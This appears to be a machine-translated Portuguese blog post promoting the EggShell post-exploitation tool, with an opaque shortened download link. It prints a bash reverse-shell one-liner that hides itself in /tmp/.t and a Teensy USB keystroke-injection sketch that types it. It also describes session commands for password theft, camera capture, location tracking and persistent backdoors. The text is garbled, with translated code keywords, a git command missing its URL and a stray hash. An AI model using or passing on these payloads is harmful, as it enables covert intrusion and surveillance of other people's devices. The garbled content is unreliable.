O que é EggShell e como baixá-lo
Se você estiver procurando por uma ferramenta de vigilância pós-exploração poderosa e versátil para dispositivos iOS, macOS e Linux, talvez queira conferir o EggShell. Neste artigo, explicaremos o que é EggShell, o que ele pode fazer e como baixá-lo e instalá-lo em sua máquina. Também mostraremos como criar e executar payloads com EggShell para obter acesso remoto e controle sobre seus dispositivos de destino.
eggshell download
DOWNLOAD: https://urlca.com/2vQhIG
Introdução
O que é casca de ovo?
EggShell é uma ferramenta de vigilância pós-exploração escrita em Python. Ele fornece uma sessão de linha de comando com funcionalidade extra entre você e uma máquina de destino. EggShell foi originalmente desenvolvido como uma prova de conceito para explorar dispositivos iOS, mas desde então se expandiu para oferecer suporte a macOS e Linux também. EggShell é baseado no projeto de substituição de shell Cloud:9ine que circulou de 1999 a cerca de 2002.
O que a EggShell pode fazer?
O EggShell oferece o poder e a conveniência de fazer upload/download de arquivos, conclusão de guias, tirar fotos, rastreamento de localização, execução de comandos shell, persistência, privilégios crescentes, recuperação de senha e muito mais. Você pode usar o EggShell para monitorar e manipular seus dispositivos de destino remotamente, bem como executar várias tarefas de pentesting. Alguns dos recursos do EggShell incluem:
Criptografia SSL para comunicação segura
Preenchimento de tabulação para facilitar a navegação
Payloads para bash, teensy (injeção USB) e iOS
Capacidade de tirar fotos da câmera
Capacidade de rastrear a localização do dispositivo
Capacidade de recuperar senhas de chaveiros, navegadores, wi-fi, etc.
Capacidade de executar comandos e scripts do shell
Capacidade de fazer upload/download de arquivos
Capacidade de persistir no dispositivo
Capacidade de escalar privilégios
Multihandler para gerenciar várias sessões
Como baixar e instalar EggShell
Requisitos
Para usar o EggShell, você precisa ter o Python 2.7 instalado em sua máquina.Você também precisa ter um dispositivo de destino que seja iOS (desbloqueado), macOS ou Linux. Você pode usar qualquer aplicativo de terminal móvel ou cliente SSH para se conectar ao seu dispositivo de destino.
instalação macOS/Linux
Para instalar o EggShell em sua máquina macOS ou Linux, você precisa clonar o repositório GitHub e executar o script eggshell.py. Você pode usar os seguintes comandos em seu terminal:
git clone cd eggshell python eggshell.py
Isso iniciará a interface de linha de comando EggShell, onde você pode criar e gerenciar suas cargas e sessões.
Instalação do iOS (desbloqueado)
Para instalar o EggShell no seu dispositivo iOS, você precisa ter o Cydia instalado no seu dispositivo com jailbreak. Você pode adicionar a seguinte fonte Cydia:
Então, você pode instalar o EggShell 3 do Cydia. Depois disso, você pode usar qualquer aplicativo de terminal móvel e executar o comando eggshell para iniciar a interface de linha de comando EggShell.
Como criar e executar payloads com EggShell
Carga Bash
Um bash payload é um one-liner que estabelece uma sessão eggshell após a execução na máquina de destino. Para criar uma carga bash, você precisa selecionar bash no menu carga útil na interface de linha de comando EggShell. Em seguida, você precisa inserir o endereço IP e o número da porta de sua máquina, onde estará ouvindo as conexões de entrada. Você pode usar o seguinte comando para descobrir seu endereço IP:
ifconfig grep inet
Depois disso, você obterá uma carga bash semelhante a esta:
bash && clear && echo "bash -i >& /dev/tcp/192.168.1.10/4444 0>&1" > /tmp/.t && chmod +x /tmp/.t && /tmp/.t && rm /tmp/.t
Você precisa copiar e colar esta carga útil na máquina de destino e executá-la. Isso criará uma conexão shell reversa com sua máquina e iniciará uma sessão eggshell.
Teensy payload (injeção USB)
Uma carga útil teensy é um script que pode ser carregado em um dispositivo teensy, que é uma pequena placa de desenvolvimento USB que pode emular entradas de teclado e mouse. Para criar uma carga útil teensy, você precisa selecionar teensy no menu de carga útil na interface de linha de comando EggShell. Em seguida, você precisa inserir o endereço IP e o número da porta de sua máquina, onde estará ouvindo as conexões de entrada. Você receberá uma pequena carga que se parece com isto:
void setup() Keyboard.set_modifier(MODIFIERKEY_GUI); Teclado.set_key1(KEY_SPACE); Keyboard.send_now(); atraso(500); Keyboard.set_modifier(0); Teclado.set_key1(0); Keyboard.send_now(); atraso(500); Teclado.print("terminal"); atraso(500); Keyboard.set_key1(KEY_RETURN); Keyboard.send_now(); atraso(1000); Keyboard.print("bash && clear && echo \"bash -i >& /dev/tcp/192.168.1.10/4444 0>&1\" > /tmp/.t && chmod +x /tmp/.t && /tmp /.t && rm /tmp/.t"); atraso(500); Keyboard.set_key1(KEY_RETURN); Keyboard.send_now(); void loop()
Você precisa copiar e colar esta carga útil no Arduino IDE e carregá-la em seu dispositivo teensy. Em seguida, você precisa conectar o pequeno dispositivo à máquina de destino e esperar que ele execute a carga útil. Isso criará uma conexão shell reversa com sua máquina e iniciará uma sessão eggshell.
Interagindo com uma sessão
Depois de criar e executar uma carga útil na máquina de destino, você precisa iniciar um ouvinte em sua máquina para receber a conexão de entrada. Você pode usar o comando listen na interface de linha de comando EggShell e inserir o número da porta que você usou para sua carga útil. Você verá uma mensagem como esta:
Escutando na porta 4444... Conexão de: 192.168.1.11 EggShell: root#
Isso significa que você estabeleceu com sucesso uma sessão eggshell com a máquina de destino. Agora você pode usar vários comandos para interagir com a máquina de destino, como:
help: mostra uma lista de comandos disponíveis
ls: lista arquivos e diretórios no diretório de trabalho atual
cd: altera o diretório de trabalho atual
cat: exibe o conteúdo de um arquivo
download: baixa um arquivo da máquina de destino para sua máquina
upload: carrega um arquivo de sua máquina para a máquina de destino
captura de tela: tira uma captura de tela da tela da máquina de destino
picture: tira uma foto da câmera da máquina de destino
localização: mostra a localização da máquina de destino no Google Maps
persistence: instala um backdoor persistente na máquina de destino
senhas: recupera senhas de chaveiros, navegadores, wi-fi, etc.
shell: executa um comando ou script shell na máquina de destino
exit: fecha a sessão atual
Conclusão
Resumo dos principais pontos
Neste artigo, aprendemos o que é EggShell, o que ele pode fazer e como baixá-lo e instalá-lo em nossas máquinas. Também aprendemos como criar e executar payloads com EggShell para obter acesso remoto e controlar nossos dispositivos de destino. EggShell é uma ferramenta de vigilância pós-exploração poderosa e versátil que pode nos ajudar a monitorar e manipular dispositivos iOS, macOS e Linux remotamente.
Chamada para ação
Se você estiver interessado em aprender mais sobre o EggShell e como usá-lo para suas necessidades de pentesting, visite o repositório oficial do GitHub e leia a documentação e os tutoriais. Você também pode participar da comunidade EggShell no Discord e conversar com outros usuários e desenvolvedores. EggShell é um projeto de código aberto, então você também pode contribuir para seu desenvolvimento e melhoria relatando problemas, sugerindo recursos ou enviando solicitações pull. EggShell é uma ótima ferramenta para hackers éticos e pesquisadores de segurança que desejam explorar e explorar dispositivos iOS, macOS e Linux.
perguntas frequentes
Qual é a diferença entre EggShell e Metasploit?
EggShell e Metasploit são estruturas de pós-exploração que permitem criar e executar cargas úteis em máquinas de destino.No entanto, o EggShell é mais focado em dispositivos iOS, macOS e Linux, enquanto o Metasploit oferece suporte a uma ampla variedade de plataformas, incluindo Windows, Android e aplicativos da web. O EggShell também possui alguns recursos exclusivos que o Metasploit não possui, como tirar fotos, rastrear a localização e recuperar senhas.
O uso do EggShell é legal?
O uso do EggShell é legal, desde que você tenha a permissão do proprietário do dispositivo de destino ou o esteja usando para fins educacionais em seus próprios dispositivos. Usar EggShell sem permissão ou para fins maliciosos é ilegal e antiético e pode resultar em consequências legais. Você deve sempre seguir as regras do hacking ético e respeitar a privacidade e a segurança dos outros.
Como posso proteger meus dispositivos do EggShell?
Para proteger seus dispositivos do EggShell, você deve sempre manter seu sistema operacional e aplicativos atualizados com os patches de segurança mais recentes. Você também deve evitar abrir links ou anexos suspeitos de fontes desconhecidas, pois eles podem conter cargas úteis de EggShell. Você também deve usar senhas e criptografia fortes para seus dispositivos e contas e evitar conectar-se a redes ou dispositivos USB não confiáveis. Você também deve instalar um software antivírus ou firewall confiável em seus dispositivos e verificá-los regularmente em busca de sinais de infecção.
Posso usar o EggShell em dispositivos iOS sem jailbreak?
Não, você não pode usar o EggShell em dispositivos iOS sem jailbreak. O jailbreak é um processo que remove as restrições e limitações impostas pela Apple em dispositivos iOS, permitindo que você instale aplicativos não autorizados e acesse arquivos do sistema. O jailbreak é necessário para usar o EggShell em dispositivos iOS, pois permite que você execute a carga útil e estabeleça uma conexão com a máquina do invasor. No entanto, o jailbreak também anula sua garantia e expõe seu dispositivo a riscos de segurança, portanto, você deve fazê-lo por sua conta e risco.
Posso usar o EggShell em dispositivos Windows?
Não, você não pode usar o EggShell em dispositivos Windows.O EggShell foi projetado apenas para dispositivos iOS, macOS e Linux. No entanto, existem outras ferramentas de pós-exploração que você pode usar para dispositivos Windows, como Metasploit, Empire ou PowerShell Empire. Essas ferramentas têm funcionalidades semelhantes ao EggShell, mas são compatíveis com plataformas Windows. 0517a86e26
Comments